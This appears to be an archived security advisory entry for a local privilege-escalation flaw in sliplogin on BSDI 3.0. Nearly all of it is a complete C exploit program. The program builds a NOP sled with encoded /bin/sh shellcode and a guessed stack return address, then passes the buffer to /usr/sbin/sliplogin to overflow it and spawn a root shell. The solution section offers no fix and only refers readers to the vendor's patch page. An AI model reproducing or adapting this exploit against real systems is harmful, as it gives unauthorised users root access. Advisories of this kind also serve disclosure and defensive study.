COMMAND

    sliplogin

SYSTEMS AFFECTED

    BSDI 3.0 (possibly others too)

PROBLEM

    Following  sliplogin  exploit  was  found  as  part  of  RootShell
    Security Advisory #3.  Exploit follows:

    #include <stdlib.h>
    #include <unistd.h>

    unsigned long get_esp(void)
    {
     __asm__("movl %esp, %eax");
    }

    void main(int argc, char **argv)
    {
     unsigned char shell[] =
      "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
      "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
      "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff_bin_sh";

     char *buf,*p;
     unsigned long *adr;

     int i;

     if((p = buf = malloc(2028+28))==NULL)
     exit(-1);

     memset(p, 0x90, 2028);
     p += 2028 - strlen(shell);

     for(i = 0; i < strlen(shell); i++)
      *p++ = shell[i];
     adr = (long *)p;
     for(i = 0; i < 7; i++)
      *adr++ = get_esp();
     p = (char *)adr;
     *p = 0;
     execl("/usr/sbin/sliplogin", buf, NULL);
    }

SOLUTION

    Not sure if this is patched or not, however, you should check BSDI
    patch page.  As soon as I get info I'll update this.